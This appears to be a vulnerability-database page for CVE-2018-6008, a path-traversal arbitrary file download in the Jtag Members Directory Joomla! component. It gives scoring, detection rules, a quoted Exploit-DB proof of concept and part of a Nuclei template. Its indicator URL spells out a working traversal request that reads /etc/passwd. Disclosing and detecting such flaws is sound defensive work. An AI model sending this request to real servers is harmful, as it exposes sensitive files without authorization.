CVE-2018-6008
published 2018-01-29CVE-2018-6008: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
PriorityP266high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
37.40%
98.3th percentile
Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlatag | jtag_members_directory | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd↗
- →Detect LFI exploitation attempts targeting the Jtag Members Directory component by matching the Joomla component option and task parameters in HTTP GET requests. ↗
- →Alert on HTTP 200 responses to requests containing 'com_jtagmembersdirectory' and 'download_file' with path traversal sequences, especially when the response body matches the pattern 'root:.*:0:0:' indicating /etc/passwd disclosure. ↗
- ·The vulnerability is exploited via the 'download_file' parameter in the Jtag Members Directory component (com_jtagmembersdirectory). The attacker-controlled parameter is passed directly without sanitization, enabling path traversal to arbitrary files. ↗
- ·The exploit requires no authentication (PR:N, UI:N per CVSS), meaning any unauthenticated remote attacker can trigger the file download. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
exploitdb·2018-01-28·CVSS 7.5
CVE-2018-6008 [HIGH] Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
---
# # # # #
# Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: https://joomlatag.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/
# Version: 5.3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6008
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker download arbitrary file....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=[FILE
Nuclei
Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-6008 [HIGH] Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
Template:
id: CVE-2018-6008
info:
name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
remediation: |
Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
reference:
- https://www.exploit-db.com/e
https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.htmlhttps://www.exploit-db.com/exploits/43913/https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.htmlhttps://www.exploit-db.com/exploits/43913/
2018-01-29
Published